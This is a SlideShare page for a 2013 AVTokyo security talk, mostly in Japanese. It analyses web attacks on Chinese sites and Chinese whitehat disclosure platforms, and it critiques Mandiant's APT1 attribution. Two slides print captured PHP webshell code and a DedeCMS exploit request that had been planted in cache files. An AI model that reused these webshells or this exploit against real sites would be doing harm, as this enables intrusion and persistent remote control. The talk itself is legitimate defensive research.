AVTokyo 2013.5 - China is a victim, too :-)

3,682 views
3,604 views

Published on

{Anthony LAI, Zetta KE}, Researcher

[en] China is a victim, too :-)
アンソニー・ライ、ゼッタ KE
中国はいつも他者を攻撃する攻撃者として認識されているが、逆に「中国が誰かから攻撃を受けているのではないか?」という視点で、どのような攻撃をうけ、どんな理由があるのか?をお見せしよう。
さらに、他の有名な機関から発表されたAPTの調査報告書の内容から、中国からの攻撃を「推測」し、それらの「論理」についてのコメントする。
また、我々はKnownsecからキャプチャされたWeb攻撃データをVXRLで解析を行っており、うまくいけば、より鮮明な絵をお見せすることができると考えている。
もちろん、アジェンダにないオフレコ情報もあるので、みなさんに楽しんでもらえると思う。

China is always taken as an attacker to attack others, let us take a look who is attacking China, what kind of attacks China is suffering from and the possible reason, moreover, we would like to take APT research report published from other famous agency how they "deduce" the attacks from China, commenting on their "logic".
In addition, we have got Knownsec to provide captured and identified Web attack data to VXRL for analysis, hopefully, we could get a much more clearer picture.
Of course, we got a hidden agenda as well.
It would be a fun session and let us enjoy it..

Published in: Technology
0 Comments
5 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
3,682
On SlideShare
0
From Embeds
0
Number of Embeds
6
Actions
Shares
0
Downloads
27
Comments
0
Likes
5
Embeds 0
No embeds

No notes for slide

AVTokyo 2013.5 - China is a victim, too :-)

  1. 1. China is a victim, too :) (AVTokyo Special Edition) Darkfloyd x Zetta, VXRL
  2. 2. 免責条項  我々は、 中国や香港の政府で 働いているわけではなく、 支援やお金ももらってません。
  3. 3. 目的 ● いつも中国は積極的な攻撃者側であるとされて いるが、解析を通じて別の側面が見えてきた : − Part1: 中国の様々な Web サイトに対する攻撃を解 析したある一日 − Part2: 中国ではソフトやサイトの脆弱性はどのよう に公開されているか知っていますか? ● − 報道はいつも中国のブラックハット側ばかりを扱うが、 ホワイトハットはどうなってるの? Part3:APT1 レポートへの反論 (Ran2 より )
  4. 4. Part 1: 中国の様々な Web サイトに対する 攻撃を解析したある一日
  5. 5. 研究と解析 ● ● ● 北京の Knownsec のクラウドベースのアプリケ ーション FW からキャプチャした攻撃のログ / データと VXRL で解析をした結果を共有してい る。 我々は 11 月 11 日を解析した。この日は中国本 土でオンラインショッピング / 電子商取引の割 引が行われる日 (Single's Day, 光棍節 ) 。 我々は攻撃の重要度やインパクトを考慮して被 害者の IP やドメイン名は公開しない。
  6. 6. Single's Day, 光棍節とは ?
  7. 7. Single's Day, 光棍節とは ?
  8. 8. Single’s Day は 米国でいえばサイバーマンデー http://en.wikipedia.org/wiki/Singles_Day
  9. 9. 研究と解析 ● 我々は何を観察して解析をしたいのか? − 割合分布:海外からの攻撃 vs 国内からの攻撃 − 主な被害者はどんな攻撃を受けている? − 優秀な攻撃者? どんな攻撃手法を好む? − どんなシステムやプラットフォームがターゲットに なっている? − その他興味深い攻撃ペイロードは?
  10. 10. 11/11 の攻撃トラフィック vs ペイロー ド 攻撃トラフィック( 1 分ごとの合計)
  11. 11. 11/11 の攻撃トラフィック vs ペイロー ド: 夕方から夜 攻撃トラフィック( 1 分ごとの合計、スキャナーのトラフィックを除外)
  12. 12. 攻撃タイプの分布 Attack Type SCANNER No. of Request Percentage 59101248 91.3447% LRFI 218753 0.3381% FILEI 222774 0.3443% SPECIAL 35838 0.0554% WEBSHELL 42463 0.0656% 4491625 6.9421% SQLI 274792 0.4247% XSS 225796 0.3490% 1022 0.0016% 86140 0.1331% 887 0.0014% 64701338 100.00% COLLECTOR OS_COMMAND CODE OTHERS
  13. 13. 電子ショッピングの日 (2013/11/11) の攻撃者はどこにいる? 解析結果から 97.5 % は「中国国内の IP から」 残り 2.5% は海外から それらにはスキャナーも含む
  14. 14. スキャナーからの攻撃を除いたら どうでしょうか? Country Attack China 1070489 US     18588 Netherlands 5404 Hong Kong 4288 Korea 1823 Turkey 1429 Japan 872
  15. 15. 攻撃者トップ 25 24 位はアメリ カ それ以外は すべて中国
  16. 16. ケーススタディ: 中国は被害者であるかないか?!
  17. 17. “ いい人ランキング”への投票 Tou.php – “Tou” は “投票” , 中国語で “投” このサイトへのリクエストデータは 6.5GB にもなる。 事実、我々中国人は「良い行いと、善良な人」に対してポジテ ィブにサポートをする ただ、実際の投票とロボットによる投票の区別は難しい
  18. 18. 我々は、香港から攻撃トラフィック を発見した Abuse X-Forwarder to fake different IP address to voting from 58.64.X.X
  19. 19. それは私が好きな ISP だった :)
  20. 20. 11/11 のショッピングの日 (Single’s Day) ! 「グループ購入のサイト」へ 47 回の古い OS コ マンドの攻撃通信を見つけた
  21. 21. 海外からの攻撃はどうだろう? どこから? Country China US Korea Hong Kong Thailand Taiwan Japan IP 116.252.224.162 173.208.240.190 119.70.29.137 58.64.205.27 110.34.230.226 118.233.66.105 202.89.232.79
  22. 22. 観察:海外からの 興味深い攻撃はあるか? アメリカから?! 中国の Python レイヤー 7 の DDos スクリプ ト?!( 0:00-2359 )
  23. 23. 観察:中国のツールが アメリカの IP アドレスから :) http://www.dklkt.cn/article.asp?id=233
  24. 24. アメリカからの攻撃はあるか?
  25. 25. アメリカからの攻撃はあるか? • • • 最近は CMS の脆弱性に関するスキャンと探索 詳細はのちほど紹介 CMS とフォーラムが標的
  26. 26. 日本からの攻撃はあるか?
  27. 27. 日本からの攻撃はあるか? 特別なものはない、単純なダウンロード、スキャ ナーからの通信 興味深いのは中国のスキャンサービス webscan.360.cn は日本の IP アドレスを使用して いる。
  28. 28. 韓国からの攻撃はあるか? こちらも特別なものはない、 単純なダウンロード、スキャナーからの通信 315online.com.cn は アンチオンライン詐欺のポータルサイト
  29. 29. 台湾やタイからの攻撃はあるか? 典型的なスキャナーの通信、特別なものは無い
  30. 30. オランダからの攻撃はあるか? 中国の Wordpress に似たサイトへのスキャン
  31. 31. 観察:被害者送られた特別なペイロード ● ● ● <URL>/plus/download.php?open=1&arrs1%5B %5D=99&arrs1%5B%5D=102&arrs1%5B %5D=103&arrs1%5B%5D=95&arrs1%5B %5D=100&arrs1%5B%5D=98&arrs1%5B %5D=112&arrs1%5B%5D=114&arrs1%5B %5D=101&arrs1%5B%5D=102&arrs1%5B %5D=105&arrs1%5B%5D=120&arrs2%5B %5D=109&arrs2%5B%5D=121&arrs2%5B Dedecms に Webshell バックドアを作成 Dedecms の脆弱性を使って多くの攻撃を受けている http://www.wooyun.org/searchbug.php?q=dedecms
  32. 32. Dedecms ( 中国製 CMS)
  33. 33. DedeCMS
  34. 34. 参考 : DedeCMS Exploit Interesting technique to hid the webshell: put it like a cache file. http://www.nxadmin.com/penetration/1168.html http://blog.csdn.net/seoyundu/article/details/12855759 /plus/download.php exploit - Inject Webshell http://www.xiaosedi.com/post/dedecms_exp_01.html /plus/search.php exploit - Inject Webshell http://eoo.hk/oswork/28.htm DedeCMS backdoor killer from Anquan.org http://edu.cnw.com.cn/edu-security/netsec/websec/htm2013/20130807_27895
  35. 35. ログに 90sec.php を見つけて、 .inc ファイルに以下のステートメントがあっ た: {dede:php}file_put_contents(’90sec.php’,'<?php eval($_POST[guige]);?>’); {/dede:php} でも、そんなフォルダーは見つからない なぜ? data/cache フォルダー配下に、以下のコードを含む複数の htm (myad1.htm,myad-16.htm,mytag-1208.htm) ファイルが見つかった : <!– document.write(“dedecmsisok<?php @eval($_POST[cmd]);?>”); –> <!– document.write(“<?php $fp = @fopen(‘av.php’, ‘a’);@fwrite($fp, ‘<?php eval($_POST[110]) ? >axxxxx’);echo ‘OK’;@fclose($fp);?>”); –> <!– document.write(“<?php echo ‘dedecms 5.7 0day<br>guige, 90sec.org’;@preg_replace(‘/ [copyright]/e’,$_REQUEST['guige'],’error’);?>”); –>
  36. 36. おかしい、 .htm ページが webshell として機能している。 そして .htm ファイルが他の php ファイルを include している。 チェックをしたら /mytag_js.php が追加されていた
  37. 37. スキャナーに検出されることなく、様々な ID を渡 しながら、以下の URL で webshell バックドアをト リガーする : http://www.nxadmin.com/plus/mytag_js.php?id=1208 http://www.nxadmin.com/plus/ad_js.php?id=1 参考 :http://www.nxadmin.com/penetration/1168.html
  38. 38. Part 2: 中国のホワイトハット組織
  39. 39. 中国のホワイトハット Wooyun: 中国でバグを公表 ● コンセプトは Miter の CVE に似てるが、 より有益で組織化されている ● ベンダーに対して中立 ● 一般に公開している ● ホワイトハットコミュニティを支援している ( http://www.wooyun.org/whitehats/)
  40. 40. 観察 #1: CMS のバグはいたるところにある ( 以下はグーグル翻訳結果、実際は中国語 ) http://www.wooyun.org/bug.php?action=list&subtype=52
  41. 41. 観察 #2: ホワイトハットが脆弱性を報告しても… ● ● ホワイトハットが 360 に対して高リスクの脆弱性を報 告したが、 360 は「無視する ! 」と言った ファック!( -_- )凸
  42. 42. かたくなに無視されている 高~中レベルの脆弱性 ( 黄色で強 調) http://www.wooyun.org/corps/%E5%A5%87%E8%99%8E360
  43. 43. 観察 #3: ベンダーからの報奨金と ホワイトハットの促進
  44. 44. Zoomeye (www.zoomeye.org)
  45. 45. 中国のホワイトハット : Anquan.org ( 様々なソフトウェアやセキュリティ製 品ベンダーの間でのセキュア同盟 ) ● 800 のベンダー ● ベンダーに対して中立 ● どんな違反行為、プライバシー侵害、フィッシ ングアタック等に対しても報告できる公共のプ ラットフォーム ● http://www.anquan.org/help/aboutus/authen/
  46. 46. まだ時間があるなら、、、 Part 3: APT1 レポート - VXRL の Ran2 からの反論
  47. 47. APT1 レポート : 反論 ● ● ● Mandiant の APT1 レポートを読んだ人いる? VXRL の研究者、 Ran2 がレポートを分析し た。 Mandiant は、中国人民解放軍 61389 部隊から 米国への攻撃があったと推測 : − 攻撃者のパスワード − フォーラムの投稿  から攻撃者をプロファイリング
  48. 48. Mandiant の APT1 レポート ● ● ● 2013 年 2 月 18 日に、 Mandiant は前例のない 報告書を発表した。 "APT1: 中国のサイバースパイユニットの一つ に関する暴露 " Mandiant は、人民解放軍( PLA )の 61398 部 隊と、 APT 攻撃グループ APT1 (別名コメン トクルー)とを結ぶ証拠を発見したと主張
  49. 49. Mandiant の APT1 レポート ● ● ● 中国当局は、 Mandiant が非難している APT の 活動へのつながりを全面的に否定している。 数名の論評家曰く: "Mandiant は明らかに Beijing (北京)の犯行現場を抑えている " しかし、懐疑論者曰く: "Mandiant によって証 拠が中国または PLA に向けられるようにでっ ち上げられている。結論に説得力のあるハッキ ングの証拠が含まれていなかった "
  50. 50. 事実の解明 #1: 攻撃者のプロファイリング ● 「 APT1 はデジタルマシンの中の幽霊ではな い」と Mandinat は主張する。 Mandinat は APT1 のペルソナの数を特定した。 APT1 レポ ートの 51 ページでは、 APT1 のペルソナを特 定したデータマイニングによるプロファイリン グの方法についてのヒントが示されている。 − APT1 のデジタル兵器の作者 ( つまり、マルウェアの作者 ) − APT1 の FQDN の登録者 ( 別名 FQDN プロファイリング ) − 電子メールアカウント ( ソーシャルウェブサイトで使われた ) − 漏洩した Rootkit.com アカウントの登録記録
  51. 51. 事実の解明 #1: 攻撃者のプロファイリング ● ● プロファイリングの結果に基づき、上海を拠点 にし、マルウェアの作者と連絡を取る義務があ り、 APT1 攻撃の準備および実行した 3 つのペ ルソナは PLA のために働いていると Mandiant はと信じていた。 UglyGorilla ( UG )は、上記の結論につながる 特定された主要なペルソナである。
  52. 52. 事実の解明 #1: 攻撃者のプロファイリング ● さらにインターネット上で検索し、私もまた中 国の軍事フォーラムで Jack Wang の投稿を発 見した。 UglyGorilla もしくは Jack Wang が、 実際に 15 のメッセージを投稿したことを私は 発見したが、サイバー戦争に関連する投稿はた ったの 2 つしかなかった。その他のトピックは 通常の戦争やバイオ化学兵器の話題であった。 彼は軍事戦争の愛好家としてフォーラムに投稿 していたが、彼自身が兵士であると言及してい なかった。私はこの情報も APT1 レポートの中 で開示されるべきだと思う。
  53. 53. 事実の解明 #1: 攻撃者のプロファイリング ● UglyGorilla が APT1 マルウェアの作成者である Jack Wang または Wang Dong であることを証 明する高い可能性を持っているにもかかわら ず、私は彼が中国兵または PLA の 61398 部隊 にサービスを提供している証拠を見つけていま せん。私は見つけることができる唯一のつなが りは中国の軍事フォーラムでの彼の投稿です が、自分がただの軍事愛好家と述べただけだっ た。
  54. 54. 事実の解明 #1: 攻撃者のプロファイリング ● UglyGorilla と同様に、 APT1 レポートに記さ れたもう一つのペルソナ、 DOTA を特定しま した。キャプチャされたビデオより、 DOTA は メールアカウントを登録するため一度だけ使用 され、監視対象の踏み台への RDP 接続によっ て得た情報だと私は考えています。
  55. 55. 事実の解明 #1: 攻撃者のプロファイリング ● ● DOTA は上海の電話を使用していたし、他の関 係者と通信するとき、彼は英語に堪能であるこ とが明確に証明されている。私は、 DOTA が 「 2j3c1k 」(二局三处一科)総参謀部第三部 第二局を意味するパスワードを使用していると 信じている。 しかし、我々は、他に(二鸡三吃一刻)「 3 種 類の方法で 2 羽の鶏を調理した瞬間」の意味で もあることを否定できない。
  56. 56. 事実の解明 #1: 攻撃者のプロファイリング ● はい、それは興味深いですね。中国語を簡単な 文字で表す方法はたくさんあります。 ● 私は告発するための出口を探そうとしている訳 ではありませんが、 APT1 が PLA の 61398 部 隊であることを指し示す確固たる証拠を見た い。
  57. 57. 事実の解明 # 2 :インフラ、 リモートデスクトップセッション ● Mandiant は 4 ページで、 1905 のうち 1849 セ ッションで「中国語(簡体字) - 米国のキーボ ード」キーボードレイアウトを使用したと付言 している。また、彼らは攻撃者が Microsoft の OS の中国語版を使用したと考えている。攻撃 者が Microsoft の OS の中国語版を使用してい るという理由で、 Mandiant は APT1 は中国本 土にいる人間であると考えている。
  58. 58. 事実の解明 # 2 :インフラ、 リモートデスクトップセッション ● RDP クライアントは RDP サーバ(ここでは、 被害者または踏み台)に 4 バイトのキーボード のレイアウトを送信することが、マイクロソフ トの RDP プロトコル文書から分かった。 RDP サーバにネットワークスニファをインストール することで、デジタルな証拠を得ることができ ます。攻撃者が「中国語(簡体字) - US キー ボード」を使用した場合、受信者側では、ネッ トワークパケットから 0x0804 という 4 バイト の証拠の検出ができます。
  59. 59. APT1 レポートへの反論の さらなる詳細は − http://espionageware.blogspot.hk/
  60. 60. まとめ ● ● ● ● ● 中国のサイトへ対する興味深いペイロードと実 践を紹介しました 11 月 11 日の海外から中国への Web 攻撃 ( 電子 商取引サイトへの大量のアクセス ) は、少数派 によって行われていました。 クローラーとスキャナーがトラフィックの大多 数を占め、それ以外の大半は SQL インジェク ションです。 中国では CMS システムへの攻撃が多発してい る。 中国にはセキュリティコミュニティを支援する
  61. 61. まとめ ● ● 我々は、技術的なより合理的な推論、十分な証 明、科学的解析を元にした技術レポートを期待 します。 中国を単純にサイバー戦争の当事者と関連付け ることの無い中立的な立場の分析レポートを望 んでいます。 ● 中国のセキュリティに対する、より公平なコメ ントを望んでいます。 ● 誤った恐怖感を植えつけることで、製品やソリ ューションを売りつけることは簡単です。しか し、研究者として高い倫理観と確かな思考を備 えておいてください。私たちは研究者であり科
  62. 62. 感謝 Thank you so much :) Zetta と Ran2 の 仕事、分析、時間に尊敬と感謝 Knownsec の研究目的の攻撃ログの共有に 深い感謝 darkfloyd@vxrl.org ozetta@vxrl.org ran2@vxrl.org

×